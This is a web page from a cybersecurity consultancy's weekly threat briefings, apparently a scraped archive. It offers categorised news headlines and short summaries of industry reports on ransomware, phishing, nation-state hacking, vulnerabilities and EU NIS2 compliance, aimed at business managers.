Cyber Crime Agency Issues New 2FA Warning For Gmail, Outlook, Facebook And X Users (forbes.com)
Outages
Cyber Security Experts Brace for the Next Crisis After the CrowdStrike Near-Disaster - ClearanceJobs
Identity and Access Management
The Invisible Army of Non-Human Identities (darkreading.com)
Microsoft's guidance to help mitigate Kerberoasting | Microsoft Security Blog
Kerberoasting: A Gateway to Privilege Escalation in Enterprise Networks | HackerNoon
The NHI management challenge: When employees leave - Help Net Security
NHIs may be your biggest — and most neglected — security hole | CSO Online
Orgs With SSO Are Vulnerable to Identity-Based Attacks (darkreading.com)
Encryption
The CISO’s guide to establishing quantum resilience | CSO Online
The quantum dilemma: Game-changer or game-ender - Help Net Security
Chinese researchers claim quantum encryption attack • The Register
Linux and Open Source
New FASTCash malware Linux variant helps steal money from ATMs (bleepingcomputer.com)
Passwords, Credential Stuffing & Brute Force Attacks
How Hybrid Password Attacks Work and How to Defend Against Them (thehackernews.com)
The War on Passwords Is One Step Closer to Being Over | WIRED
FIDO Alliance is Standardizing Passkey Portability - Thurrott.com
Understand these seven password attacks and how to stop them (bleepingcomputer.com)
Are Password Managers Safe to Use? (Benefits, Risks & Best Practices) (techrepublic.com)
Social Media
Verified Influencer Accounts Are Being Hijacked to Spread Scams and Malicious Software — FBI
Training, Education and Awareness
Regulations, Fines and Legislation
NIS2: Most EU countries miss deadline to meet new cyber security rules (cnbc.com)
EU cyber security bill NIS2 hits compliance deadline | Computer Weekly
European companies anxious over non-implementation of EU cyber rules | Euronews
What is the NIS2 Directive and Why Now? - Infosecurity Magazine (infosecurity-magazine.com)
NIS 2 Compliance Deadline Approaches: What You Need To Know (techrepublic.com)
Huge number of businesses not ready for new EU cyber security laws (businessplus.ie)
Ireland to miss EU cyber security deadline (rte.ie)
Are Irish businesses ready for new cyber security rules? (rte.ie)
Only two EU countries meet NIS2 deadline - TechCentral.ie
Is your organisation ready for NIS2? | Intel 471
How NIS2 will impact sectors from healthcare to energy - Help Net Security
Ex-NCSC Chief: UK Cyber Incident Reporting a 'Good Step' (govinfosecurity.com)
Contractor pays $300K to settle Medicare data breach • The Register
AI Companies Are Not Meeting EU AI Act Standards (informationsecuritybuzz.com)
New Cyber Security Rules Threaten Defence Industrial Base - Law360
NY's Financial Regulator Releases AI Cyber Security Guidance - Law360
Models, Frameworks and Standards
EU cyber security bill NIS2 hits compliance deadline | Computer Weekly
European companies anxious over non-implementation of EU cyber rules | Euronews
What is the NIS2 Directive and Why Now? - Infosecurity Magazine (infosecurity-magazine.com)
NIS2: Most EU countries miss deadline to meet new cyber security rules (cnbc.com)
Huge number of businesses not ready for new EU cyber security laws (businessplus.ie)
Only two EU countries meet NIS2 deadline - TechCentral.ie
Is your organisation ready for NIS2? | Intel 471
NIS2 Directive: Experts share their views on the cyber security law (telecomstechnews.com)
How NIS2 will impact sectors from healthcare to energy - Help Net Security
Data Protection
CISOs' Privacy Responsibilities Keep Growing (darkreading.com)
Is a CPO Still a CPO? Privacy Leadership's Evolving Role (darkreading.com)
Careers, Working in Cyber and Information Security
CISSP and CompTIA Security+ lead as most desired security credentials - Help Net Security
The Cyber Security Burnout Crisis Is Reaching The Breaking Point (forbes.com)
Breaking into Cyber Security: It's Never Too Late- IT Security Guru
A quarter of cyber security leaders are ready to quit (betanews.com)
Stagnant salaries risk growth of infosec sector | The Global Recruiter
Security leaders can't catch a break, with many on the verge of quitting | TechRadar
Five alternative paths to the CISO chair | SC Media (scworld.com)
Helping Your Team Cope With the Stress of a Cyber Incident (inforisktoday.com)
Cyber Security Careers Go Beyond Coding | NIST
SMBs are being hit hardest by cyber security skills gap | TechRadar
Law Enforcement Action and Take Downs
Dutch police dismantled dual dark web market 'Bohemia/Cannabia' (securityaffairs.com)
Cyber Gangs Aren't Afraid of Prosecution (darkreading.com)
Brazilian Police Arrest Notorious Hacker USDoD - SecurityWeek
Two alleged operators of Anonymous Sudan named, charged • The Register
Alabama man arrested for role in SEC Twitter account hijacking | CyberScoop
Microsoft wants tougher punishments for cyber criminals • The Register
Misinformation, Disinformation and Propaganda
How nation-states exploit political instability to launch cyber operations - Help Net Security
Flood of Election-Related Cyber Activity Unleashed (darkreading.com)
Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity
Cyber Warfare and Cyber Espionage
Nation-State Cyber Threats: The Hidden War on Infrastructure - Security Boulevard
Nation State Actors
How nation-states exploit political instability to launch cyber operations - Help Net Security
Gap Between Cyber Threats And Defences ‘Widening’, Cyber Security Chief Warns - PM Today
UK Reports 50% Spike in 'Nationally Significant' Incidents (inforisktoday.com)
'Nationally significant' cyber attacks are surging, warns the UK's new cyber chief (therecord.media)
Schools under siege: from nation-states to ransomware gangs • The Register
China
Meet the Chinese 'Typhoon' hackers preparing for war | TechCrunch
China Accuses US of Fabricating Volt Typhoon to Hide Its Own Hacking Campaigns (thehackernews.com)
US lawmakers demand probe into China's Salt Typhoon hacks • The Register
White House forms emergency team to deal with China espionage hack | Stars and Stripes
Serious Adversaries Circle Ivanti CSA Zero-Day Flaws (darkreading.com)
UK Fears Chinese Hackers Compromised Critical Infrastructure (bloomberglaw.com)
Chinese State Hackers Main Suspect in Recent Ivanti CSA Zero-Day Attacks - SecurityWeek
Chinese researchers claim quantum encryption attack • The Register
Intel denies Chinese claims it helps US intelligence orgs • The Register
China trade group claims Intel ignore... - Mobile World Live
China infosec body slams Intel over chip security • The Register
Russia
Agencies warn about Russian government hackers going after unpatched vulnerabilities | CyberScoop
How Russian cyber attack on NHS harmed patients and halved blood test capacity (inews.co.uk)
Russia is actively scanning everything for known vulns • The Register
The Wiretap: Microsoft Says Kremlin Is Working With Cyber Criminals To Spy On Ukraine (forbes.com)
Uncle Sam puts $10M bounty on Russian troll farm Rybar • The Register
Independent Russian news site rides out a week of DDoS incidents (therecord.media)
The Door Closes on Kaspersky: Russia’s Tech World-Beater - CEPA
Russian court websites down after breach claimed by pro-Ukraine hackers (therecord.media)
Iran
Report: Iran cyber attacks against Israel surge after Gaza war (voanews.com)
Iran's APT34 Abuses MS Exchange (darkreading.com)
A cyber attack hit Iranian government sites and nuclear facilities (securityaffairs.com)
North Korea
Firm hacked after accidentally hiring North Korean cyber criminal - BBC News
North Korean hackers steal $3B in crypto since 2017: report | Invezz
Malicious ads exploited Internet Explorer zero day to drop malware (bleepingcomputer.com)
North Korean ScarCruft Exploits Windows Zero-Day to Spread RokRAT Malware (thehackernews.com)
Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence
Tools and Controls
Despite massive security spending, 44% of CISOs fail to detect breaches - Help Net Security
The Invisible Army of Non-Human Identities (darkreading.com)
SOC Teams: Threat Detection Tools Are Stifling Us (darkreading.com)
Microsoft's guidance to help mitigate Kerberoasting | Microsoft Security Blog
Kerberoasting: A Gateway to Privilege Escalation in Enterprise Networks | HackerNoon
The dark side of API security - Help Net Security
Organisations Slow to Protect Doors Against Hackers: Researcher - SecurityWeek
FIDO Alliance is Standardizing Passkey Portability - Thurrott.com
New Threat Actor Tool EDRSilencer Repurposed For Malicious Use (informationsecuritybuzz.com)
CIOs want a platform that combines AI, networking, and security - Help Net Security
Why Continuous API Security is Essential for Modern Businesses - Security Boulevard
NHIs may be your biggest — and most neglected — security hole | CSO Online
Why companies are struggling to keep up with SaaS data protection - Help Net Security
Rampant ransom payments highlight need for urgent action on cyber resiliency | TechRadar
Return on cyber investment | Professional Security Magazine
Orgs With SSO Are Vulnerable to Identity-Based Attacks (darkreading.com)
Hybrid Work Exposes New Vulnerabilities in Print Security (darkreading.com)
Helping Your Team Cope With the Stress of a Cyber Incident (inforisktoday.com)
What is Business Continuity Plan? How it Works! (cybersecuritynews.com)
Secure by Design: The (Necessary) Future of Hardware and Software - IT Security Guru
Finance and Insurance API Security: A Critical Imperative - Security Boulevard
While Cyber Attacks Are Inevitable, Resilience Is Vital (automation.com)
CISOs' strategies for managing a growing attack surface - Help Net Security
Reports Published in the Last Week
Other News
Microsoft wants tougher punishments for cyber criminals • The Register
Defenders must adapt to shrinking exploitation timelines - Help Net Security
The Lingering Beige Desktop Paradox (darkreading.com)
New Threat Actor Tool EDRSilencer Repurposed For Malicious Use (informationsecuritybuzz.com)
Most businesses “overconfident and underprepared” for 2025 cyber threats – PCR (pcr-online.biz)
Microsoft: K-12, Universities Face Thousands of Attacks (darkreading.com)
Breaking down government hacks: The rise of the modern kill chain (federalnewsnetwork.com)
British intelligence services to protect all UK schools from ransomware attacks (therecord.media)
Top 10 Countries with Best Cyber Security, Finland Ranked First - Life En.tempo.co
6 biggest healthcare security threats | CSO Online
Retail CISOs Take on More Risk to Foster Innovation (darkreading.com)
Marlink reports increase in maritime cyber threats - Port Technology International
Vulnerability Management
Agencies warn about Russian government hackers going after unpatched vulnerabilities | CyberScoop
Google: 70% of exploited flaws disclosed in 2023 were zero-days (bleepingcomputer.com)
Russia is actively scanning everything for known vulns • The Register
Patch-22: The Catch of Waiting to Fix Cyber Security Vulnerabilities - Security Boulevard
How to defend against zero-day vulnerabilities | TechRadar
Secure by Design: The (Necessary) Future of Hardware and Software - IT Security Guru
Zero-Days Account for Most Exploited Bugs in 2023 | MSSP Alert
Vulnerabilities
86k Fortinet devices still vulnerable to active exploits • The Register
WordPress Plugin Jetpack Patches Major Vulnerability Affecting 27 Million Sites (thehackernews.com)
Oracle Patches Over 200 Vulnerabilities With October 2024 CPU - SecurityWeek
Windows 11 bug steals 8.63GB of storage space that you can't get back | Windows Central
Windows 11's 2024 update is now also killing internet connections | PCWorld
Juniper Networks Patches Dozens of Vulnerabilities - SecurityWeek
Serious Adversaries Circle Ivanti CSA Zero-Day Flaws (darkreading.com)
Akira, Fog Ransomware Leverages Critical Veeam RCE | MSSP Alert
Splunk Enterprise Update Patches Remote Code Execution Vulnerabilities - SecurityWeek
Vulnerable instances of Log4j still being used nearly 3 years later | SC Media (scworld.com)
Microsoft Patches Vulnerabilities in Power Platform, Imagine Cup Site - SecurityWeek
VMware fixes high-severity SQL injection CVE-2024-38814 in HCX (securityaffairs.com)
SolarWinds hardcoded credential now exploited in the wild • The Register
Fortinet Edge Devices Under Attack - Again - InfoRiskToday
Malicious ads exploited Internet Explorer zero day to drop malware (bleepingcomputer.com)
Cisco Patches High-Severity Vulnerabilities in Analog Telephone Adapters - SecurityWeek
F5 BIG-IP Updates Patch High-Severity Elevation of Privilege Vulnerability - SecurityWeek
North Korean ScarCruft Exploits Windows Zero-Day to Spread RokRAT Malware (thehackernews.com)
Mozilla releases second Firefox 131 security update - gHacks Tech News
Recent Firefox Zero-Day Exploited Against Tor Browser Users - SecurityWeek
Chrome 130 Released with Fix for 17 Security Flaws (cybersecuritynews.com)
CISA Warns of Active Exploitation in SolarWinds Help Desk Software Vulnerability (thehackernews.com)
Chinese State Hackers Main Suspect in Recent Ivanti CSA Zero-Day Attacks - SecurityWeek
Iran's APT34 Abuses MS Exchange (darkreading.com)
Netgear WiFi Extender Vulnerability Let Attackers Inject Malicious Commands - Cyber Security News
Sector Specific
Industry specific threat intelligence reports are available.
Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.
· Automotive
· Construction
· Critical National Infrastructure (CNI)
· Defence & Space
· Education & Academia
· Energy & Utilities
· Estate Agencies
· Financial Services
· FinTech
· Food & Agriculture
· Gaming & Gambling
· Government & Public Sector (including Law Enforcement)
· Health/Medical/Pharma
· Hotels & Hospitality
· Insurance
· Legal
· Manufacturing
· Maritime & Shipping
· Oil, Gas & Mining
· OT, ICS, IIoT, SCADA & Cyber-Physical Systems
· Retail & eCommerce
· Small and Medium Sized Businesses (SMBs)
· Startups
· Telecoms
· Third Sector & Charities
· Transport & Aviation
· Web3
Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.
Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.
You can also follow us on Facebook, Twitter and LinkedIn.
Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.
Black Arrow Cyber Threat Briefing 11 October 2024
Black Arrow Cyber Threat Intelligence Briefing 11 October 2024:
-Your IT Systems Are Being Attacked. Are You Prepared?
-Board-CISO Mismatch on Cyber Responsibility, NCSC Research Finds
-Mounting Phishing Attacks Enabled by AI, Deepfakes
-AI is Most Serious Threat to Orgs, According to Security Professionals
-MI5 Chief Warns of Cyber Threats to the UK
-Walking the Tightrope Between Innovation and Risk
-Ransomware Severity Up 68% in First Half of 2024
-31 New Ransomware Groups in 12 Months
-Lack of Cyber Risk Quantification Leaves Companies Financially Exposed: PwC Report
-Software Supply Chain Weaknesses are Increasingly Putting Businesses at Risk
-UK Businesses Cite Economic Risks and Cyber Crime as Top 2024 Concerns: Marsh McLennan
-Cloud Security Risks Surge as 38% of Firms Face Exposures
-Insider Threat Damage Balloons as Visibility Gaps Widen
Welcome to this week’s Black Arrow Cyber Threat Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy to digest round up of the most notable threats, vulnerabilities, and cyber related news from the last week.
Top Cyber Stories of the Last Week
Your IT Systems Are Being Attacked. Are You Prepared?
Recent cyber attacks are becoming more frequent and sophisticated, emphasising the need for executive-level engagement in cyber security. Yet many organisations remain unprepared, with CEOs often delegating responsibility to IT departments. A survey revealed that while increasing AI use is expected to lead to more breaches, four in five security officers plan to use AI for defence. Experts advise that CEOs should actively participate in cyber security planning, ask critical questions like 'What are we doing? Is it enough? How do we know?', and regularly review measures to avoid significant business disruptions and regulatory penalties.
Board-CISO Mismatch on Cyber Responsibility, NCSC Research Finds
The UK's National Cyber Security Centre (NCSC) has found that 80% of board members and security leaders are uncertain about who holds responsibility for cyber security in their organisations. This confusion stems from CISOs believing accountability lies with the board, while board members think it rests with CISOs. The NCSC's research highlighted that many board members lack in-depth cyber knowledge, leading to gaps in oversight. In response, the NCSC has published new guidance to help CISOs effectively communicate with boards, aiming to bridge this gap and reduce cyber risk across organisations.
Mounting Phishing Attacks Enabled by AI, Deepfakes
A recent report has found that phishing attacks increased by 28% between the first and second quarters of 2024. Of the phishing kits used, 75% leveraged artificial intelligence and 82% incorporated deepfake capabilities. 44% of the attacks between April and June exploited compromised email accounts, with 8% originating from supply chain accounts. Hyperlinks were identified as the most common attack payload, followed by attachments. The report highlighted that attackers' use of AI in phishing toolkits lowers the barrier to entry for cyber attacks. It emphasised the need for organisations to adopt advanced AI defences without introducing new vulnerabilities by using AI unnecessarily.
AI is Most Serious Threat to Orgs, According to Security Professionals
Keeper Security has found that AI-driven cyber threats are now the most serious concern for organisations, with 51% of security leaders identifying them as such. Despite 81% of organisations implementing AI usage policies and 77% of leaders being familiar with AI security best practices, 35% feel least prepared to combat AI-powered attacks compared to other cyber threats. The survey also highlighted that 84% of IT and security leaders find AI-powered tools have made phishing and smishing attacks harder to detect. Organisations are prioritising data encryption, employee training, and advanced threat detection systems to counter these evolving threats.
MI5 Chief Warns of Cyber Threats to the UK
MI5 has warned that cyber threats from Russia, China, and Iran are a growing concern for the UK. Director General Ken McCallum highlighted that these nations are heavily investing in human intelligence and advanced cyber operations targeting government information, technology, and democratic institutions. Despite expelling over 750 Russian diplomats since early 2022—the majority being spies—cyber espionage activities have intensified. MI5 and the National Cyber Security Centre anticipate increased cyber attacks on Western cyber defences, particularly from Russian state actors. McCallum also emphasised the distinct threat posed by China, urging a comprehensive response to build resilience.
Walking the Tightrope Between Innovation and Risk
A recent analysis revealed that early engagement with CISOs in innovation projects leads to proactive security measures, building trust and ensuring innovation and security can coexist. Interestingly, organisations using older operational systems were shielded from recent security incidents, highlighting the inevitable trade-off between innovation and risk. The report suggests reframing the conversation to 'secure innovation' and emphasises fostering a security-first culture where employees are the first line of defence. Additionally, it stresses the importance of ensuring third-party vendors are secure, as a single compromised user could trigger a company-wide incident.
Ransomware Severity Up 68% in First Half of 2024
Cyber Insurer Coalition has found that while cyber insurance claims frequency decreased slightly in the first half of 2024, ransomware severity surged by 68%, with average losses per incident reaching $353,000. Businesses with over $100 million in revenue saw a 140% increase in claims severity, averaging losses of $307,000. Ransomware, though accounting for 18% of claims, heavily drove overall severity. The report also highlighted that 40% of policyholders paid ransom demands. Additionally, organisations using outdated technologies were 2.5 times more likely to experience a claim, underscoring the need for updated security measures.
31 New Ransomware Groups in 12 Months
There has been a 30% increase in active ransomware groups over the past year, with 31 new ransomware groups identified in the last twelve months. Despite intensified law enforcement efforts, the ransomware landscape has become more fragmented. LockBit remained the most active group, accounting for 17% of victims but down 8% from the previous year due to law enforcement operations. The cyber criminal group Play doubled its victim count to become the second most active, while newcomer RansomHub accounted for 7%.
Lack of Cyber Risk Quantification Leaves Companies Financially Exposed: PwC Report
PwC's latest report reveals a significant gap in how organisations quantify cyber risks financially. Despite 89% of executives agreeing on the importance of measuring cyber risk for investment prioritisation, only 15% effectively do so. This disconnect leaves many companies financially vulnerable, with only 21% allocating cyber budgets to top risks. While 77% of executives expect cyber security budgets to increase next year, without proper quantification, funds may not address the most pressing threats. The report highlights that over half of executives see cyber security as a differentiator influencing customer trust and brand loyalty, yet a lack of effective measurement persists.
Software Supply Chain Weaknesses are Increasingly Putting Businesses at Risk
BlackBerry reports that software supply chain weaknesses are increasingly putting businesses at risk of cyber attacks, with 51% of UK IT leaders receiving notifications of attacks or vulnerabilities in the past year. Despite this, 58% trust their suppliers' cyber security policies are comparable or stronger than their own, yet less than half requested compliance confirmations. Additionally, 51% found unknown participants in their software supply chain. The consequences are significant: 71% suffered financial loss, 67% faced data and reputational damage, and 42% took over a week to recover from such attacks.
UK Businesses Cite Economic Risks and Cyber Crime as Top 2024 Concerns: Marsh McLennan
Marsh McLennan has found that economic risks and financial challenges are the top concern for UK businesses over the next 12 months, with 43% of leaders citing these issues. Cyber threats take the number two spot, where the sharp rise in attacks is seen as a growing concern, jumping from 20% in 2023 to 39% in 2024. The report highlights that business leaders plan to prioritise strengthening cyber security measures, including assessing supply chain risks and customer relationships.
Cloud Security Risks Surge as 38% of Firms Face Exposures
Cloud security risks are surging, with 38% of organisations globally facing critical exposures from a combination of security gaps. These security concerns intensify due to the "toxic cloud triad" of publicly exposed, critically vulnerable, and highly privileged cloud workloads, leaving firms vulnerable to cyber attacks resulting in disruptions, system takeovers, and data breaches. Despite the average cost of a data breach in 2024 nearing $5 million, many organisations have misconfigurations and excessive permissions; 84% possess unused or long-standing access keys; and 74% have publicly exposed storage.
Insider Threat Damage Balloons as Visibility Gaps Widen
Recent research indicates that insider threats have led to a sharp increase in cyber attacks, with 83% of organisations experiencing such incidents in 2024, up from 60% the previous year. The growing complexity of IT systems and the adoption of technologies like AI and cloud services are creating visibility gaps and escalating risks. Nearly half of the organisations reported more frequent insider attacks, with remediation costs ranging from $100,000 to $2 million per incident. Additionally, 45% take a week or longer to recover, underscoring the need for improved policies, staff training, and advanced incident-response solutions.
Sources:
https://www.darkreading.com/cyberattacks-data-breaches/it-systems-being-attacked-prepared
https://www.infosecurity-magazine.com/news/boardciso-mismatch-on-cyber/
https://www.msspalert.com/brief/mounting-phishing-attacks-enabled-by-ai-deepfakes
https://www.inforisktoday.com/mi5-chief-warns-cyberthreats-to-uk-a-26483
https://www.darkreading.com/vulnerabilities-threats/walking-tightrope-innovation-risk
https://www.infosecurity-magazine.com/news/new-ransomware-groups-emerge-2024/
https://www.infosecurity-magazine.com/news/cloud-security-risks-surge-38/
Governance, Risk and Compliance
Board-CISO Mismatch on Cyber Responsibility - Infosecurity Magazine (infosecurity-magazine.com)
Walking the Tightrope Between Innovation & Risk (darkreading.com)
Warning over cyber security gap in the HR sector | theHRD (thehrdirector.com)
Your IT Systems Are Being Attacked. Are You Prepared? (darkreading.com)
US CISO Compensation on the Rise, Report Finds | MSSP Alert
45% of cyber security leaders are stressed about budget restraints | Security Magazine
The three qualities modern CISOs must have today to succeed | SC Media (scworld.com)
CISO Paychecks: Worth the Growing Security Headaches? (darkreading.com)
From IT to Boardroom: NIS2 Reshapes Cyber Security Roles (databreachtoday.co.uk)
Organisations are taking action towards cyber resilience: PwC - Reinsurance News
Cyber risk advice for boards | Professional Security Magazine
How the increasing demand for cyber insurance is changing the role of the CISO | CSO Online
Chief risk storyteller: How CISOs are developing yet another skill | CSO Online
Ex-Uber CISO Requests New, 'Fair' Trial (darkreading.com)
Cultivating a security-first mindset: Key leadership actions - Help Net Security
What is OPSEC (operations security)? | Definition from TechTarget
Widening talent pool in cyber with on-demand contractors - Help Net Security
Cyber Accountability Building • Stimson Center
Facts and Stats about Cyber Security and Compliance - Security Boulevard
Many C-suite execs have lost confidence in IT, including CIOs | CIO
Threats
Ransomware, Extortion and Destructive Attacks
Why evolving cyber threats mean small businesses are ransomware targets – Computerworld
Secureworks: Ransomware takedowns didn’t put off cyber criminals | Computer Weekly
Guidance for ransomware incidents | Professional Security Magazine
Ransomware double-extortion group listings peaked in 2024, report finds | SC Media (scworld.com)
Criminals Are Testing Their Ransomware in Africa (darkreading.com)
Homeland Security Blocked 500+ Ransomware Attacks Since 2021 (pymnts.com)
US agency warns against crypto-hungry Trinity ransomware (cointelegraph.com)
Hackers Exploiting Veeam RCE Vulnerability to Deploy Ransomware (cybersecuritynews.com)
Ransomware Victims
Study: 92% of Healthcare Firms Hit by Cyber Attacks This Year (inforisktoday.com)
American Water shut down some of its systems following a cyber attack (securityaffairs.com)
Casio reports IT systems failure after weekend network breach (bleepingcomputer.com)
Credit monitoring and supply chain risk company hacked | CyberScoop
Medical Group Pays $240K Fine for 3 Ransomware Attacks (govinfosecurity.com)
MoneyGram: No evidence ransomware is behind recent cyber attack (bleepingcomputer.com)
Cyber expert suggests American Water cyber incident was a ransomware attack | ITPro
Phishing & Email Based Attacks
Mounting Phishing Attacks Enabled by AI, Deepfakes | MSSP Alert
Commodity and Bulk Phishing Attacks See Huge Rise | SC Media UK (scmagazineuk.com)
Microsoft: Creative Abuse of Cloud Files Bolsters BEC Attacks (darkreading.com)
Cyber crooks abuse stolen SharePoint, OneDrive, and Dropbox accounts for phishing | Cybernews
Mamba 2FA Cyber Crime Kit Strikes Microsoft Users (darkreading.com)
9 types of phishing attacks and how to identify them | CSO Online
Microsoft 365 accounts targeted by dangerous new phishing scam | TechRadar
62% of observed finance domains involved in phishing attacks | Security Magazine
Scarlett Johansson tops McAfee 2024 Celebrity Hacker Hotlist (betanews.com)
Despite Online Threats, Users Aren’t Changing Behavior (darkreading.com)
Today’s “Good Enough MFA” Should Be Phishing-Resistant - Security Boulevard
OpenAI says Chinese gang tried to phish its staff • The Register
Hurricane Helene exploited in FEMA scams, phishing | SC Media (scworld.com)
Business Email Compromise (BEC)/Email Account Compromise (EAC)
Microsoft: Creative Abuse of Cloud Files Bolsters BEC Attacks (darkreading.com)
Cyber crooks abuse stolen SharePoint, OneDrive, and Dropbox accounts for phishing | Cybernews
9 types of phishing attacks and how to identify them | CSO Online
Other Social Engineering
9 types of phishing attacks and how to identify them | CSO Online
To Deliver Malware, Attackers Use the Phone | Intel 471
Despite Online Threats, Users Aren’t Changing Behavior (darkreading.com)
Scarlett Johansson tops McAfee 2024 Celebrity Hacker Hotlist (betanews.com)
Hurricane Helene exploited in FEMA scams, phishing | SC Media (scworld.com)
Attackers Using VSCode to Remotely Compromise Systems | MSSP Alert
Artificial Intelligence
42.5% of fraud attempts are now driven by AI - TechCentral.ie
AI anxiety afflicts 90% of consumers and businesses - see what worries them most | ZDNET
AI Most Serious Threat to Orgs, According to Security Professionals - IT Security Guru
Mounting Phishing Attacks Enabled by AI, Deepfakes | MSSP Alert
Three key strategies for organisations to protect themselves from deepfakes - IT Security Guru
OpenAI details how threat actors are abusing ChatGPT | TechTarget
Hacked ‘AI Girlfriend’ Data Shows Prompts Describing Child Sexual Abuse (404media.co)
Risk Strategies Drawn From the EU AI Act (darkreading.com)
2FA/MFA
Today’s “Good Enough MFA” Should Be Phishing-Resistant - Security Boulevard
Why are we still talking about cyber security basics after all these years? - Security Boulevard
Malware
How Malware is Evolving: Sandbox Evasion and Brand Impersonation - Security Boulevard
Ukrainian pleads guilty to operating Raccoon Stealer malware (bleepingcomputer.com)
Malicious Chrome Add-ons Evade Google's Updated Security (darkreading.com)
To Deliver Malware, Attackers Use the Phone | Intel 471
Two never-before-seen tools, from same group, infect air-gapped devices - Ars Technica
The “Mongolian Skimmer” Uses Unicode To Conceal Its Malicious Intent (informationsecuritybuzz.com)
Malicious packages in open-source repositories are surging | CyberScoop
Crypto-stealing malware campaign infects 28,000 people (bleepingcomputer.com)
How macOS malware works and how to secure your Mac
Attackers Using VSCode to Remotely Compromise Systems | MSSP Alert
Bots/Botnets
New Gorilla Botnet Launches Over 300,000 DDoS Attacks Across 100 Countries (thehackernews.com)
Vulnerable APIs and Bot Attacks Costing Businesses Up to $186 Billion Annually (thehackernews.com)
Websites are losing the fight against bot attacks - Help Net Security
Unseen Threats: 95% of Advanced Bots Escape Detection on Websites | HackerNoon
Why Web Application Firewalls Are an Indispensable Part of the Security Stack (thefastmode.com)
Gorilla Botnet Launches Over 300,000 DDoS Attacks (informationsecuritybuzz.com)
Mobile
Apple iOS 18.0.1 and iPadOS 18.0.1 fix media session and passwords bugs (securityaffairs.com)
This Trojan disguises as Google Chrome or NordVPN to wipe out your accounts | Cybernews
Android 16 could let you lock your phone down even tighter with new security features | TechRadar
Google officially kicks Kaspersky antivirus software app off the Play Store | TechRadar
Google brings better bricking to Androids, to curtail crims • The Register
3 iPhone settings I changed to thwart thieves - and what to do if your phone is stolen | ZDNET
Don’t use iPhone Mirroring at work, experts warn • The Register
Denial of Service/DoS/DDoS
Cloudflare Thwarts Largest-Ever 3.8 Tbps DDoS Attack Targeting Global Sectors (thehackernews.com)
New Gorilla Botnet Launches Over 300,000 DDoS Attacks Across 100 Countries (thehackernews.com)
DDoS attacks are on the rise, and are increasingly politically-motivated | TechRadar
Internet of Things – IoT
How smart TVs spy on you and harvest data • The Register
You Need a Separate Network To Protect Yourself From Your Smart Devices (howtogeek.com)
New EU law touts strict cyber security requirements for all connected and IoT devices | Cybernews
14,000 medical devices are online, unsecured and vulnerable | CyberScoop
Data Breaches/Leaks
National Public Data files for bankruptcy after info leak • The Register
90% of Successful Attacks Result in Leaked Data (darkreading.com)
MoneyGram says hackers stole customers' personal information and transaction data | TechCrunch
Internet Archive hacked, data breach impacts 31 million users (bleepingcomputer.com)
Marriott settles for $52M after years-long breaches • The Register
Comcast confirms 237K affected in feisty breach notification • The Register
ADT discloses second breach in 2 months, hacked via stolen credentials (bleepingcomputer.com)
MoneyGram Breach: Social Security Numbers, Bank Account Details Looted (pcmag.com)
FCC Fines T-Mobile $31.5 Million After Carrier Was Hacked 8 Times In 5 Years | Techdirt
Major breach exposes every Dutch police officer: state-sponsored actor suspected | Cybernews
Leaked documents reveal British military’s secret assistance to Israeli army | Al Bawaba
Data loss incidents impact patient care - Help Net Security
Organised Crime & Criminal Actors
British man arrested over hack-to-trade scheme using email password resets | ITPro
Cyber crime and harm - POST (parliament.uk)
Man pleads guilty to stealing over $37M worth of cryptocurrency (securityaffairs.com)
Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain
Lego's website was hacked to promote a crypto scam (engadget.com)
Crypto-stealing malware campaign infects 28,000 people (bleepingcomputer.com)
Man pleads guilty to stealing over $37M worth of cryptocurrency (securityaffairs.com)
FBI created a crypto token so it could watch it being abused • The Register
US agency warns against crypto-hungry Trinity ransomware (cointelegraph.com)
Insider Risk and Insider Threats
Insider Threat Damage Balloons as Visibility Gaps Widen (darkreading.com)
Despite Online Threats, Users Aren’t Changing Behaviour (darkreading.com)
Insurance
Severity of Ransomware Attacks Rose 68% in First Half of 2024, Report Shows (claimsjournal.com)
Cyber insurance demand to rise as new threats emerge, says Bloomberg Intelligence - Reinsurance News
How the increasing demand for cyber insurance is changing the role of the CISO | CSO Online
Supply Chain and Third Parties
Software supply chain weaknesses are increasingly putting businesses at risk | TechRadar
The CrowdStrike bug and the risk of cascading failures - SiliconANGLE
What The SolarWinds Case Means For CISOs And Corporate Cyber Security (forbes.com)
Credit monitoring and supply chain risk company hacked | CyberScoop
Cloud/SaaS
Microsoft: Creative Abuse of Cloud Files Bolsters BEC Attacks (darkreading.com)
Cyber crooks abuse stolen SharePoint, OneDrive, and Dropbox accounts for phishing | Cybernews
Mamba 2FA Cyber Crime Kit Strikes Microsoft Users (darkreading.com)
Cloud Security Challenges in the Modern Era - Compare the Cloud
Hackers still prefer credentials-based techniques in cloud attacks | SC Media (scworld.com)
Microsoft 365 accounts targeted by dangerous new phishing scam | TechRadar
Social Media Accounts: The Weak Link in Organisational SaaS Security (thehackernews.com)
Outages
The CrowdStrike bug and the risk of cascading failures - SiliconANGLE
What The SolarWinds Case Means For CISOs And Corporate Cyber Security (forbes.com)
MoneyGram: No evidence ransomware is behind recent cyber attack (bleepingcomputer.com)
Encryption
Chinese hack shows why Apple is right about security backdoors (9to5mac.com)
The Wiretap: China Has Infiltrated Police Wiretap Systems (forbes.com)
The 30-year-old internet backdoor law that came back to bite | TechCrunch
Massive US security breach highlights danger of weakening encryption | Proton
Linux and Open Source
CUPS could be abused to launch massive DDoS attack • The Register
Malicious packages in open-source repositories are surging | CyberScoop
Passwords, Credential Stuffing & Brute Force Attacks
There was a 12% increase in brute force cyber attack techniques in 2024 | Security Magazine
This Popular Security Method Doesn't Actually Stop Hackers (makeuseof.com)
Hackers still prefer credentials-based techniques in cloud attacks | SC Media (scworld.com)
Password Basics: Why Mastering Fundamentals Is Crucial (informationsecuritybuzz.com)
Why are we still talking about cyber security basics after all these years? - Security Boulevard
ADT discloses second breach in 2 months, hacked via stolen credentials (bleepingcomputer.com)
Social Media
EU Court Limits Meta's Use of Personal Facebook Data for Targeted Ads (thehackernews.com)
